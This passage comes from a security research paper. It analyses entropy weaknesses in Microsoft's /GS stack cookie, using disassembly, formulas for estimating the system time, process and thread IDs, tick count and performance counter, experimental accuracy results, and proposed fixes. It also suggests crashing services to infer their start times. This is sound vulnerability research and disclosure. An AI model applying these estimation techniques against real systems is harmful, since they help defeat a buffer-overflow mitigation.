paper proposes some solutions that could +be applied to address the problems that are outlined. + +Thanks: Aaron Portnoy for lending some hardware for sample collection. +Johnny Cache and Richard Johnson for discussions and suggestions. + +2) Introduction + +Stack-based buffer overflows are generally regarded as one of the most common +and easiest to exploit classes of software vulnerabilities. This prevalence +has lead to the implementation of many security solutions that attempt to +prevent the exploitation of these vulnerabilities. Some of these solutions +include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The +shared premise of these solutions involves the placement of a cookie, or +canary, between the buffers stored in a stack frame and the stack frame's +return address. The cookie that is placed on the stack is used as a marker to +detect if a buffer overflow has occurred prior to allowing a function to +return. This simple concept can be very effective at making the exploitation +of stack-based buffer overflows unreliable. + +The cookie-based approach to detecting stack-based buffer overflows involves +three general steps. First, a cookie that will be inserted into a function's +stack frame must be generated. The approaches taken to generate cookies vary +quite substantially, some having more implications than others. Once a cookie +has been generated, it must be pushed onto the stack in the context of a +function's prologue at execution time. This ensures that the cookie is placed +before the return address (and perhaps other values) on the stack. Finally, a +check must be added to a function's epilogue to make sure that the cookie that +was stored in the stack frame is the value that it was initialized to in the +function prologue. If an overflow of a stack-based buffer occurs, then it's +likely that it will have overwritten the cookie stored after the buffer. When +a mismatch is detected, steps can be taken to securely terminate the process +in a way that will prevent exploitation. + +The security of a cookie-based solution hinges on the fact that an attacker +doesn't know, or is unable to generate, the cookie that is stored in a stack +frame. Since it's impossible to guarantee in all situations that an attacker +won't be able to generate the bytes that compose the value of a cookie, it +really all boils down to the cookie being kept secret. If the cookie is not +kept secret, then the presence of a cookie will provide no protection when it +comes to exploiting a stack-based buffer overflow vulnerability. +Additionally, if an attacker can trigger an exploitable condition before the +cookie is checked, then it stands that the cookie will provide no protection. +One example of this might include overwriting a function pointer on the stack +that is called prior to returning from the function. + +While the StackGuard and ProPolice implementations are interesting and useful, +the author feels that no implementation is more critical than the one provided +by Microsoft. The reason for this is the simple fact that the vast majority +of all desktops, and a non-trivial number of servers, run applications +compiled with Microsoft's Visual C compiler. Any one weakness found in the +Microsoft's implementation could mean that a large number of applications are +no longer protected against stack-based buffer overflows. In fact, there has +been previous research that has pointed out flaws or limitations in +Microsoft's implementation. For example, David Litchfield pointed out that +even though stack cookies are present, it may still be possible to overwrite +exception registration records on the stack which may be called before the +function actually returns. This discovery was one of the reasons that +Microsoft later introduced SafeSEH (which had its own set of issues)[6]. +Similarly, Chris Ren et al from Cigital pointed out the potential implications +of a function pointer being used in the path of the error handler for the case +of a GS cookie mismatch occurring[9]. While not directly related to a particular +flaw or limitation in GS, eEye has described some of the problems that come +when secrets get leaked[3]. + +Even though these issues and limitations have existed, Microsoft's GS +implementation at the time of this writing is considered by most to be secure. +While this paper will not present a complete break of Microsoft's GS +implementation, it will describe certain quirks and scenarios that may make it +possible to reduce the amount of effective entropy that exists in the cookies +that are generated. As with cryptography, any reduction of the entropy that +exists in the GS cookie effectively makes it so there are fewer unknown +portions of the cookie. This makes the cookie easier to guess by reducing the +total number of possibilities. Beyond this, it is expected that additional +research may find ways to further reduce the amount of entropy beyond that +described in this document. One critical point that must be made is that +since the current GS implementation is statically linked when binaries are +compiled, any flaw that is found in the implementation will require a +recompilation of all binaries affected by it. To help limit the scope, only +the 32-bit version of GS will be analyzed, though it is thought that similar +attacks may exist on the 64-bit version as well. + +The structure of this paper is as follows. In chapter 3, a brief description +of the Microsoft's current GS implementation will be given. Chapter 4 will +describe some techniques that may be used to attack this implementation. +Chapter 5 will provide experimental results from using the attacks that are +described in chapter . Chapter 6 will discuss steps that could be taken to +improve the current GS implementation. Finally, chapter 7 will discuss some +areas where future work could be applied to further improve on the techniques +described in this document. + +3) Implementation + +As was mentioned in the introduction, security solutions that are designed to +protect against stack-based buffer overflows through the use of cookies tend +to involve three distinct steps: cookie generation, prologue modifications, +and epilogue modifications. Microsoft's GS implementation is no different. +This chapter will describe each of these three steps independent of one +another to paint a picture for how GS operates. + +3.1) Cookie Generation + +Microsoft chose to have the GS implementation generate an image file-specific +cookie. This means that each image file (executable or DLL) will have their +own unique cookie. When used in conjunction with a stack frame, a function +will insert its image file-specific cookie into the stack frame. This will be +covered in more detail in the next section. The actual approach taken to +generate an image file's cookie lives in a compiler inserted routine called +__security_init_cookie. This routine is placed prior to the call to the image +file's actual entry point routine and therefore is one of the first things +executed. By placing it at this point, all of the image file's code will be +protected by the GS cookie. + +The guts of the __security_init_cookie routine are actually the most critical part +to understand. At a high-level, this routine will take an XOR'd combination +of the current system time, process identifier, thread identifier, tick count, +and performance counter. The end result of XOR'ing these values together is +what ends up being the image file's security cookie. To understand how this +actually works in more detail, consider the following disassembly from an +application compiled with version 14.00.50727.42 of Microsoft's compiler. +Going straight to the disassembly is the best way to concretely understand the +implementation, especially if one is in search of weaknesses. + +Like all functions, the __security_init_cookie function starts with a prologue. +It allocates storage for some local variables and initializes some of them to +zero. It also initializes some registers, specifically edi and ebx which will +be used later on. + +.text:00403D58 push ebp +.text:00403D59 mov ebp, esp +.text:00403D5B sub esp, 10h +.text:00403D5E mov eax, __security_cookie +.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0 +.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0 +.text:00403D6B push ebx +.text:00403D6C push edi +.text:00403D6D mov edi, 0BB40E64Eh +.text:00403D72 cmp eax, edi +.text:00403D74 mov ebx, 0FFFF0000h + +As part of the end of the code above, a comparison between the current +security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie +is called, the global securitycookie is initialized to 0xbb40e64e. The +constant comparison is used to see if the GS cookie has already been +initialized. If the current cookie is equal to the constant, or the high +order two bytes of the current cookie are zero, then a new cookie is +generated. Otherwise, the complement of the current cookie is calculated and +cookie generation is skipped. + +.text:00403D79 jz short loc_403D88 +.text:00403D7B test eax, ebx +.text:00403D7D jz short loc_403D88 +.text:00403D7F not eax +.text:00403D81 mov __security_cookie_complement, eax +.text:00403D86 jmp short loc_403DE8 + +To generate a new cookie, the function starts by querying the current system +time using GetSystemTimeAsFileTime. The system time as represented by Windows +is a 64-bit integer that measures the system time down to a granularity of 100 +nanoseconds. The high order 32-bit integer and the low order 32-bit integer +are XOR'd together to produce the first component of the cookie. Following +that, the current process identifier is queried using GetCurrentProcessId and +then XOR'd as the second component of the cookie. The current thread +identifier is then queried using GetCurrentThreadId and then XOR'd as the +third component of the cookie. The current tick count is queried using +GetTickCount and then XOR'd as the fourth component of the cookie. Finally, +the current performance counter value is queried using +QueryPerformanceCounter. Like system time, this value is also a 64-bit +integer, and its high order 32-bit integer and low order 32-bit integer are +XOR'd as the fifth component of the cookie. Once these XOR operations have +completed, a comparison is made between the newly generated cookie value and +the constant 0xbb40e64e. If the new cookie is not equal to the constant +value, then a second check is made to make sure that the high order two bytes +of the cookie are non-zero. If they are zero, then a 10 bit left shift of the +cookie is performed in order to seed the high order bytes. + +.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime] +.text:00403D8C push eax +.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4 +.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime] +.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime] +.text:00403D99 call ds:__imp__GetCurrentProcessId@0 +.text:00403D9F xor esi, eax +.text:00403DA1 call ds:__imp__GetCurrentThreadId@0 +.text:00403DA7 xor esi, eax +.text:00403DA9 call ds:__imp__GetTickCount@0 +.text:00403DAF xor esi, eax +.text:00403DB1 lea eax, [ebp+PerformanceCount] +.text:00403DB4 push eax +.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4 +.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4] +.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount] +.text:00403DC1 xor esi, eax +.text:00403DC3 cmp esi, edi +.text:00403DC5 jnz short loc_403DCE +... +.text:00403DCE loc_403DCE: +.text:00403DCE test esi, ebx +.text:00403DD0 jnz short loc_403DD9 +.text:00403DD2 mov eax, esi +.text:00403DD4 shl eax, 10h +.text:00403DD7 or esi, eax + +Finally, when a valid cookie is generated, it's stored in the image file's +securitycookie. The bit-wise complement of the cookie is also stored in +securitycookiecomplement. The reason for the existence of the complement will +be described later. + +.text:00403DD9 mov __security_cookie, esi +.text:00403DDF not esi +.text:00403DE1 mov __security_cookie_complement, esi +.text:00403DE7 pop esi +.text:00403DE8 pop edi +.text:00403DE9 pop ebx +.text:00403DEA leave +.text:00403DEB retn + +In simpler terms, the meat of the cookie generation can basically be +summarized through the following pseudo code: + +Cookie = SystemTimeHigh +Cookie ^= SystemTimeLow +Cookie ^= ProcessId +Cookie ^= ThreadId +Cookie ^= TickCount +Cookie ^= PerformanceCounterHigh +Cookie ^= PerformanceCounterLow + +3.2) Prologue Modifications + +In order to make use of the generated cookie, functions must be modified to +insert it into the stack frame at the time that they are called. This does +add some overhead to the call time associated with a function, but its overall +effect is linear with respect to a single invocation. The actual +modifications that are made to a function's prologue typically involve just +three instructions. The cookie that was generated for the image file is XOR'd +with the current value of the frame pointer. This value is then placed in the +current stack frame at a precisely chosen location by the compiler. + +.text:0040214B mov eax, __security_cookie +.text:00402150 xor eax, ebp +.text:00402152 mov [ebp+2A8h+var_4], eax + +It should be noted that Microsoft has taken great care to refine the way a +stack frame is laid out in the presence of GS. Locally defined pointers, +including function pointers, are placed before statically sized buffers in the +stack frame. Additionally, dangerous input parameters passed to the function, +such as pointers or structures that contain pointers, will have local copies +made that are positioned before statically sized local buffers. The local +copies of these parameters are used instead of those originally passed to the +function. These two changes go a long way toward helping to prevent other +scenarios in which stack-based buffer overflows might be exploited. + +3.3) Epilogue Modifications + +When a function returns, it must check to make sure that the cookie that was +stored on the stack has not been tampered with. To accomplish this, the +compiler inserts the following instructions into a function's prologue: + +.text:00402223 mov ecx, [ebp+2A8h+var_4] +.text:00402229 xor ecx, ebp +.text:0040222B pop esi +.text:0040222C call __security_check_cookie + +The value of the cookie that was stored on the stack is moved into ecx and +then XOR'd with the current frame pointer to get it back to the expected +value. Following that, a call is made to securitycheckcookie where the stack +frame's cookie value is passed in the ecx register. The securitycheckcookie +routine is very short and sweet. The passed in cookie value is compared with +the image file's global cookie. If they don't match, reportgsfailure is +called and the process eventually terminates. This is what one would expect +in the case of a buffer overflow scenario. However, if they do match, the +routine simply returns, allowing the calling function to proceed with +execution and cleanup. + +.text:0040634B cmp ecx, __security_cookie +.text:00406351 jnz short loc_406355 +.text:00406353 rep retn +.text:00406355 loc_406355: +.text:00406355 jmp __report_gsfailure + +4) Attacking GS + +At the time of this writing, all publicly disclosed attacks against GS that +the author is aware of have relied on getting control of execution before the +cookie is checked or by finding some way to leak the value of the cookie back +to the attacker. Both of these styles of attack are of great interest and +value, but the focus of this paper will be on a different method of attacking +GS. Specifically, this chapter will outline techniques that may be used to +make it easier to guess the value an image file's GS cookie. Two techniques +will be described. The first technique will describe methods for calculating +the values that were used as entropy sources when the cookie was generated. +These calculations are possible in situations where an attacker has local +access to the machine, such as through the console or through terminal +services. The second technique describes the general concept of predictable +ranges of some values that are used in the context of boot start services, +such as lsass.exe. This predictability may make the guessing of a GS cookie +more feasible in both local and remote scenarios. + +4.1) Calculating Entropy Sources + +The sources used to generate the GS cookie for a given image file are constant +and well-known. They include the current system time, process identifier, +thread identifier, tick count, and performance counter. In light of that +fact, it only makes sense to investigate the amount of effective entropy each +source adds to the cookie. Since it's a requirement that the cookie produced +be secret, the ability to guess a value used in the generation of the cookie +will allow it to be canceled out of the equation. This is true due to the +simple fact that each of the values used to generate the cookie is XOR'd with +each other value (XOR is a commutative operation). The ability to guess +multiple values can make it possible to seriously impact the overall integrity +of the cookie. + +While the sources used in the generation of the cookie have long been regarded +as satisfactory, the author has found that the majority of the sources +actually contribute little to no value toward the overall entropy of the +cookie. However, this is currently only true if an attacker has local access +to the machine. Being able to know a GS cookie that was used in a privileged +process would make it possible to exploit a local privilege escalation +vulnerability, for example. There may be some circumstances where the +techniques described in this section could be applied remotely, but for the +purpose of this document, only the local scenario will be considered. The +following subsections will outline methods that can be used to calculate or +deterministically find the specific values that were used when a cookie was +being generated in a particular process context. As a result of this +analysis, it's become clear that the only particular variable source of true +entropy for the GS cookie is the low 17 bits of the performance counter. All +other sources can be reliably calculated, with some margin of error. + +For the following subsections, a modified executable named vulnapp.exe was +used to extract the information that was used at the time that a process +executable's GS cookie was generated. In particular, __security_init_cookie was +modified to jump into a function that saves the information used to generate +the cookie. The implementation of this function is shown below for those who +are curious: + +// +// The FramePointer is the value of EBP in the context of the +// __security_init_cookie routine. The cookie is the actual, +// resultant cookie value. GSContext is a global array. +// +VOID DumpInformation( + PULONG FramePointer, + ULONG Cookie) +{ + GSContext[0] = FramePointer[-3]; + GSContext[1] = FramePointer[-4]; + GSContext[2] = FramePointer[-1]; + GSContext[3] = FramePointer[-2]; + GSContext[4] = GetCurrentProcessId(); + GSContext[5] = GetCurrentThreadId(); + GSContext[6] = GetTickCount(); + GSContext[7] = Cookie; +} + +4.1.1) System Time + +System time is a value that one might regard as challenging to recover. After +all, it seems impossible to get the 100 nanosecond granularity of the system +time that was retrieved when a cookie was being generated. Quite the +contrary, actually. There are a few key points that go into being able to +recover the system time. First, it's a fact that even though the system time +measures granularity in terms of 100 nanosecond intervals, it's really only +updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs). +To many, 15.625 may seem like an odd number, but for those familiar with the +Windows thread scheduler, it can be recognized as the period of the timer +interrupt. For that reason, the current system time is only updated as a +result of the timer interrupt firing. This fact means that the alignment of +the system time that is used when a cookie is generated is known. + +Of more interest, though, is the relationship between the system time value +and the creation time value associated with a process or its initial thread. +Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds, +it follows that the granularity of the thread creation time will be the same. +In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long +for the processor to execute all instructions from the creation of the thread +to the generation of the security cookie. This fact means that it's +possible to assume that the creation time of a process or thread is the +same as the system time that was used when the cookie was generated. This +assumption doesn't always work, though, and there are indeed cases where +the creation time will not equal the system time that was used. These +situations are usually a result of the thread that creates the cookie not +being immediately scheduled. + +Even if this is the case, it would be necessary to be able to obtain the +creation time of an arbitrary process or thread. On the surface, this would +seem impossible because task manager prevents a non-privileged user from +getting the start time of a privileged process. + +This is all a deception, though, because there does exist functionality that +is exposed to non-privileged users that can be used to get this information. +One way of getting it is through the use of the native API routine +NtQuerySystemInformation. In this case, the +SystemProcessesAndThreadsInformation system information class is used to query +information about all of the running processes on the system. This +information includes the process name, process creation time, and the creation +time for each thread in each process. While this information class has been +removed in Windows Vista, there are still potential ways of obtaining the +creation time information. For example, an attacker could simply crash the +vulnerable service once (assuming it's not a critical service) and then wait +for it to respawn. Once it respawns, the creation time can be inferred based +on the restart delay of the service. Granted, service restarts are limited +to three times per day in Vista, but crashing it once should cause no major +issues. + +Using NtQuerySystemInformation, it's possible to collect some data that can be +used to determine the likelihood that the creation time of a thread will be +equal to the system time that was used when a GS cookie was generated. To +test this, the author used the modified vulnapp.exe executable to extract the +system time at the time that the cookie was generated. Following that, a +separate program was used to collect the creation time information of the +process in question using the native API. The initial thread's creation time +was then compared with the system time to see if they were equal. The +creation time and system time were often equal in a sample of 742 cookies. + +Obviously, the data set describing differences is only relevant to a +particular system load. If there are many threads waiting to run during the +time that a process is executed, then it is unlikely that the system time will +equal the process creation time. In a desktop environment, it's probably safe +to assume that the thread will run immediately, but more conclusive evidence +may be necessary. + +Given these facts, it is apparent that the complete 64-bit system time value +can be recovered more often than not with a great degree of accuracy just by +simply assuming that thread creation time is the same as the system time +value. + +4.1.2) Process and Thread Identifier + +The process and thread identifier are arguably the worst sources of entropy +for the GS cookie, at least in the context of a local attack. The two high +order bytes of the process and thread identifiers are almost always zero. +This means they have absolutely no effect on the high order entropy. +Additionally, the process and thread identifier can be determined with 100 +percent accuracy in a local context using the same API described in the +previous section on getting the system time. This involves making use of +the NtQuerySystemInformation native API with the +SystemProcessesAndThreadsInformation system information class to get the +process identifier and thread identifier associated with a given process +executable. + +The end result, obviously, is that the process and thread identifier can be +determined with great accuracy. The one exception to this rule would be +Windows Vista, but, as was mentioned before, alternative methods of obtaining +the process and thread identifier may exist. + +4.1.3) Tick Count + +The tick count is, for all intents and purposes, simply another measure of +time. When the GetTickCount API routine is called, the number of ticks is +multiplied by the tick count multiplier. This multiplication effectively +translates the number of ticks to the number of milliseconds that the system +has been up. If one can safely assume that the that the system time used to +generate the cookie was the same as the thread creation time, then the tick +count at the time that the cookie was generated can simply be calculated using +the thread creation time. The creation time isn't enough, though. Since the +GetTickCount value measures the number of milliseconds that have occurred +since boot, the actual uptime of the system has to be determined. + +To determine the system uptime, a non-privileged user can again make use of +the NtQuerySystemInformation native API, this time with the +SystemTimeOfDayInformation system information class. This query returns the +time that the system was booted as a 64-bit integer measured in 100 nanosecond +intervals, just like the thread creation time. To calculate the system uptime +in milliseconds, it's as simple as subtracting the boot time from the creation +time and then dividing by 10000 to convert from 100 nanosecond intervals to 1 +millisecond intervals: + +EstTickCount = (CreationTime - BootTime) / 10000 + +Some experimentation shows that this calculation is pretty accurate, but some +quantity is lost in translation. From what the author has observed, a +constant scaling factor of 0x4e, or 78 milliseconds, needs to be added to the +result of this calculation. The source of this constant is as of yet unknown, +but it appears to be a required constant. This results in the actual equation +being: + +EstTickCount = [(CreationTime - BootTime) / 10000] + 78 + +The end result is that the tick count can be calculated with a great degree of +accuracy. If the system time calculation is off, then that will directly +affect the calculation of the tick count. + +4.1.4) Performance Counter + +Of the four entropy sources discussed so far, the performance counter is the +only one that really presents a challenge. The purpose of the performance +counter is to describe the total number of cycles that have executed. On the +outside, the performance counter would seem impossible to reliably determine. +After all, how could one possibly determine the precise number of cycles that +had occurred as a cookie was being generated? The answer, of course, comes +down to the fact that the performance counter itself is, for all intents and +purposes, just another measure of time. Windows provides two interesting +user-mode APIs that deal with the performance counter. The first, +QueryPerformanceCounter, is used to ask the kernel to read the current value +of the performance counter[8]. The result of this query is stored in the 64-bit +output parameter that the caller provides. The second API is +QueryPerformanceFrequency. This routine is interesting because it returns a +value that describes the amount that the performance counter will change in +one second[7]. Documentation indicates that the frequency cannot change while +the system is booted. + +Using the existing knowledge about the uptime of the system and the +calculation that can be performed to convert between the performance counter +value and seconds, it is possible to fairly accurately guess what the +performance counter was at the time that the cookie was generated. Granted, +this method is more fuzzy than the previously described methods, as +experimental results have shown a large degree of fluctuation in the lower 17 +bits. Those results will be discussed in more detail in chapter . The actual +equation that can be used to generate the estimated performance counter is to +take the uptime, as measured in 100 nanosecond intervals, and multiply it by +the performance frequency divided by 10000000, which converts the frequency +from a measure of 1 second to 100 nanosecond: + +EstPerfCounter = UpTime x (PerfFreq / 10000000) + +In a fashion similar to tick count, a constant scaling factor of -165000 was +determined through experimentation. This seems to produce more accurate +results in some of the 24 low bits. Based on this calculation, it's possible +to accurately determine the entire 32-bit high order integer and the first 15 +bits of the 32-bit low order integer. Of course, if the system time estimate +is wrong, then that directly effects this calculation. + +4.1.5) Frame Pointer + +While the frame pointer does not influence an image file's global cookie, it +does influence a stack frame's version of the cookie. For that reason, the +frame pointer must be considered as an overall contributor to the effective +entropy of the cookie. With the exception of Windows Vista, the frame pointer +should be a deterministic value that could be deduced at the time that a +vulnerability is triggered. As such, the frame pointer should be considered a +known value for the majority of stack-based buffer overflows. Granted, in +multi-threaded applications, it may be more challenging to accurately guess +the value of the frame pointer. + +In the Windows Vista environment, the compile-time GS implementation gets a +boost in security due to the introduction of ASLR. This helps to ensure that +the frame pointer is actually an unknown quantity. However, it doesn't +introduce equal entropy in all bits. In particular, octet 4, and potentially +octet 3, may have predictable values due to the way that the randomization is +applied to dynamic memory allocations. In order to prevent fragmentation of +the address space, Vista's ASLR implementation attempts to ensure that stack +regions are still allocated low in the address space. This has the side +effect of ensuring that a non-trivial number of bits in the frame pointer will +be predictable. Additionally, while Vista's ASLR implementation makes an +effort to shift the lower bits of the stack pointer, there may still be some +bits that are always predictable in octet 2. + +4.2) Predictability of Entropy Sources in Boot Start Services + +A second attack that could be used against GS involves attacking services that +start early on when the system is booted. These services may experience more +predictable states of entropy due to the fact that the amount of time it takes +to boot up and the order in which tasks are performed is fairly, though not +entirely, consistent. This insight may make it possible to estimate the value +of entropy sources remotely. + +To better understand this type of attack, the author collected 742 samples +that were taken from a custom service that was set to automatically start +during boot on a Windows XP SP2 installation. This service was simply +designed to log the state used at the time that the GS cookie was being +generated. While a sampling of the GS cookie state applied to lsass.exe would +have been more ideal, it wasn't worth the headache of having to patch a +critical system service. Perhaps the reader may find it interesting to +collect this data on their own. From the samples that were taken, the +following diagrams show the likelihood of each individual bit being set for +each of the different entropy sources. + +Overall, there are a number of predictable bits in things like the high +32-bits of both the system time and the performance counter, the process +identifier, the thread identifier, and the tick count. The sources that are +largely unpredictable are the low 32-bits of the system time and the +performance counter. However, if it were possible to come up with a way to +discover the boot time (or uptime) of the system remotely, it might be +possible to infer a good portion of the low 32-bits of the system time. This +would then directly impact the ability to estimate things like the tick count +and performance counters. + +5) Experimental Results + +This chapter describes some of the initial results that were collected using a +utility developed by the author named gencookie.exe. This utility attempts to +calculate the value of the cookie that was generated for the executable image +associated with an arbitrary process, such as lsass.exe. While the results of +this utility were limited to attempting to calculate the cookie of a process' +executable, the techniques described in previous chapters are nonetheless +applicable to the cookies generated in the context of dependent DLLs. The +results described in this chapter illustrate the tool's ability to accurately +obtain specific bits within the different components that compose the cookie, +including specific bits of the cookie itself. This helps to paint a picture +of the amount of true entropy that is reduced through the techniques described +in this document. + +The data set that was used to calculate the overall results included 5001 +samples which were collected from a single machine. The samples were +collected through a few simple steps. First, a program called vulnapp.exe +that was compiled with /GS was modified to have its __security_init_cookie routine +save information about the cookie that was generated and the values that +contributed to its generation. Following that, the gencookie.exe utility was +launched against the running process in an attempt to calculate vulnapp.exe's +GS cookie. A comparison between the expected and actual value of each +component was then saved. These steps were repeated 5001 times. The author +would be interested in hearing about independent validation of the findings +presented in this chapter. + +The following sections describe the bit-level predictability of each of the +components that are used to generate the GS cookie, including the overall +predictability of the bits of the GS cookie itself. + +5.1) System Time + +The system time component was highly predictable. The high 32-bit bits of the +system time were predicted with 100 percent accuracy. The low 32-bit bits on +the other hand were predicted with only 77 percent accuracy (3878 times). The +reason for this discrepancy has to do with the thread scheduling scenario +described in subsection . Even still, these results indicate that it is +likely that the entire system time value can be accurately calculated. + +5.2) Process and Thread Identifier + +The process and thread identifier were successfully calculated 100 percent of +the time using the approach outlined in section . + +5.3) Tick Count + +The tick count was accurately calculated 67 percent of the time (3396 times). +The reason for this lower rate of success is due in large part to the fact +that the tick count is calculated in relation to the estimated system time +value. As such, if an incorrect system time value is determined, the tick +count itself will be directly influenced. This should account for at least 23 +percent of the inaccuracies judging from how often the system time was +inaccurately estimated. The remaining 10 percent of the inaccuracies is as of +yet undetermined, but it is most likely related to the an improper +interpretation of the constant scaling factor that is applied to the tick +count. In any case, it is expected that only a few bits are actually affected +in the remaining 10 percent of cases. + +5.4) Performance Counter + +The high 32-bits of the performance counter were successfully estimated 100 +percent of the time. The low 32-bits, on the other hand, show the greatest +degree of volatility when compared to the other components. The high order 15 +bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50 +split. The remaining 17 bits were all guessed correctly roughly 50 percent of +the time. This makes the low 17 bits the only truly effective source of +entropy in the performance counter since there is no bias shown in relation to +the estimated versus actual values. Indeed, this is not enough to prove that +there aren't observable patterns in the low 17 bits, but it is enough to show +that the gencookie.exe utility was not effective in estimating them. Figures +and show the percent accuracy for the high and low order 32-bits. + +This discrepancy actually requires a more detailed explanation. In reality, +the estimates made by the gencookie.exe utility are actually not as far off as +one might think based on the percent accuracy of each bit as described in the +diagrams. Instead, the estimates are, on average, off by only 105,000. This +average difference is what leads to the lower 17 bits being so volatile. One +thing that's interesting about the difference between the estimated and actual +performance counter is that there appears to be a time oriented trend related +to how far off the estimates are. Due to the way that the samples were taken, +it's safe to assume that each sample is roughly equivalent to one second worth +of time passing (due to a sleep between sample collection). Further study of +this apparent relationship may yield better results in terms of estimating the +lower 17 bits of the low 32 bits of the performance counter. This is left for +future research. + +5.5) Cookie + +The cookie itself was never actually guessed during the course of sample +collection. The reason for this is tightly linked with the current inability +to accurately determine the lower 17 bits of the low 32 bits of the +performance counter. Comparing the percent accuracy of the cookie bits with +the percent accuracy of the low 32 bits of the performance counter yields a +very close match. + +6) Improvements + +Based on the results described in chapter , the author feels that there is +plenty of room for improvement in the way that GS cookies are currently +generated. It's clear that there is a need to ensure that there are 32 bits +of true entropy in the cookie. The following sections outline some potential +solutions to the entropy issue described in this document. + +6.1) Better Entropy Sources + +Perhaps the most obvious solution would be to simply improve the set of +entropy sources used to generate the cookie. In particular, the use of +sources with greater degrees of entropy, especially in the high order bits, +would be of great benefit. The challenge, however, is locating sources that +are easy to interact with and require very little overhead. For example, it's +not really feasible to have the GS cookie generator rely on the crypto API due +to the simple fact that this would introduce a dependency on the crypto API in +any application that was compiled with /GS. As this document has hopefully +shown, it's also a requirement that any additional entropy sources be +challenging to estimate externally at a future point in time. + +Even though this is a viable solution, the author is not presently aware of +any additional entropy sources that would meet all three requirements. For +this reason, the author feels that this approach alone is insufficient to +solve the problem. If entropy sources are found which meet these +requirements, the author would love to hear about them. + +6.2) Seeding High Order Bits + +A more immediate solution to the problem at hand would involve simply ensuring +that the predictable high order bits are seeded with less predictable values. +However, additional entropy sources would be required in order to implement +this properly. At present, the only major source of entropy found in the GS +cookie is the low order bits of the performance counter. It would not be +sufficient to simply shift the low order bits of the performance counter into +the high order. Doing so would add absolutely no value by itself because it +would have no effect on the amount of true entropy in the cookie. + +6.3) External Cookie Generation + +An alternative solution that could combine the effects of the first two +solutions would be to change the GS implementation to generate the cookie +external to the binary itself. One of the most dangerous aspects of the GS +implementation is that it is statically linked and therefore would require a +recompilation of all affected binaries in the event that a weakness is found. +This fact alone should be scary. To help address both this problem and the +problem of weak entropy sources, it makes sense to consider a more dynamic +approach. + +One example of a dynamic approach would be to have the GS implementation issue +a call into a kernel-mode routine that is responsible for generating GS +cookies. One place that this support could be added is in +NtQuerySystemInformation, though it's likely that a better place may exist. +Regardless of the specific routine, this approach would have the benefit of +moving the code used to generate the cookie out of the statically linked stub +that is inserted by the compiler. If any weakness were to be found in the +kernel-mode routine that generates the cookie, Microsoft could issue a patch +that would immediately affect all applications compiled to use GS. This would +solve some of the concerns relating to the static nature of GS. + +Perhaps even better, this approach would grant greater flexibility to the +entropy sources that could be used in the generation of the cookie. Since the +routine would exist in kernel-mode, it would have the benefit of being able to +access additional sources of entropy that may be challenging or clumsy to +interact with from user-mode (though the counterpoint could certainly be made +as well). The kernel-mode routine could also accumulate entropy over time and +feed that back into the cookie, whereas the statically linked implementation +has no context with which to accumulate entropy. The accumulation of state +can also do more harm than good. It would be disingenuous to not admit that +this approach could also have its own set of problems. A poorly implemented +version of this solution might make it possible for a user to eliminate all +entropy by issuing a non-trivial number of calls to the kernel-mode routine. +There may be additional consequences that have not yet been perceived. + +The impact on performance is also a big point of concern for any potential +change to the cookie generation path. At a high-level, a transition into +kernel-mode would seem concerning in terms of the amount of overhead that +might be added. However, it's important to note that the current +implementation of GS already transitions into kernel-mode to obtain some of +it's information. Specifically, performance counter information is obtained +through the system call NtQueryPerformanceCounter. Even more, this system +call results in an in operation on an I/O port that is used to query the +current performance counter. + +Another important consideration is backward compatibility. If Microsoft were +to implement this solution, it would be necessary for applications compiled +with the new support to still be able benefit from GS on older platforms that +don't support the new kernel interface. To allow for backward compatibility, +Microsoft could implement a combination of all three solutions, whereby better +entropy sources and seeding of high order bits are used as a fallback in the +event that the kernel-mode interface is not present. + +As it turns out, Microsoft does indeed have a mechanism that could allow them +to create a patch that would affect the majority of the binaries compiled with +recent versions of GS. This functionality is provided by exposing the address +of an image file's security cookie in its the load config data directory. +When the dynamic loader (ntdll) loads an image file, it checks to see if the +security cookie address in the load config data directory is non-NULL. If +it's not NULL, the loader proceeds to store the process-wide GS cookie in the +module-specific's GS cookie location. In this way, the __security_init_cookie +routine that's called by the image file's entry point effectively becomes a +no-operation because the cookie will have already been initialized. This +manner of setting the GS cookie for image files provides Microsoft with much +more flexibility. Rather than having to update all binaries compiled with GS, +Microsoft can simply update a single binary (ntdll.dll) if improvements need +to be made to the cookie generation algorithm. The following output shows a +sample of dumpbin /loadconfig on kernel32.dll: + +Microsoft (R) COFF/PE Dumper Version 8.00.50727.42 +Copyright (C) Microsoft Corporation. All rights reserved. + + +Dump of file c:\windows\system32\kernel32.dll + +File Type: DLL + + Section contains the following load config: + + 00000048 size + 0 time date stamp +... + 7C8836CC Security Cookie + +7) Future Work + +There is still additional work that can be done to further refine the +techniques described in this document. This chapter outlines some of the +major items that could be followed up on. + +7.1) Improving Performance Counter Estimates + +One area in particular that the author feels could benefit from further +research has to do with refining the technique used to calculate the +performance counter. A more thorough analysis of the apparent association +between time and the lower 17 bits of the performance counter is necessary. +This analysis would directly affect the ability to recover more cookie state +information, since the entropy of the lower 17 bits of the performance counter +is one of the only things standing in the way of obtaining the entire cookie. + +7.2) Remote Attacks + +The ability to apply the techniques described in this document in a remote +scenario would obviously increase the severity of the problem. In order to do +this, an attacker would need the ability to either infer or be able to +calculate some of the key elements that are used in the generation of a +cookie. This would rely on being able to determine things like the process +creation time, the process and thread identifier, and the system uptime. With +these values, it should be possible to predict the state of the cookie with +similar degrees of accuracy. Of course, methods of obtaining this information +remotely are not obvious. + +One point of consideration that should be made is that even if it's not +possible to directly determine some of this information, it may be possible to +infer it. For instance, consider a scenario where a vulnerability in a +service is exposed remotely. There's nothing to stop an attacker from causing +the service to crash. In most cases, the service will restart at some +predefined point (such as 30 seconds after the crash). Using this approach, +an attacker could infer the creation time of the process based on the time +that the 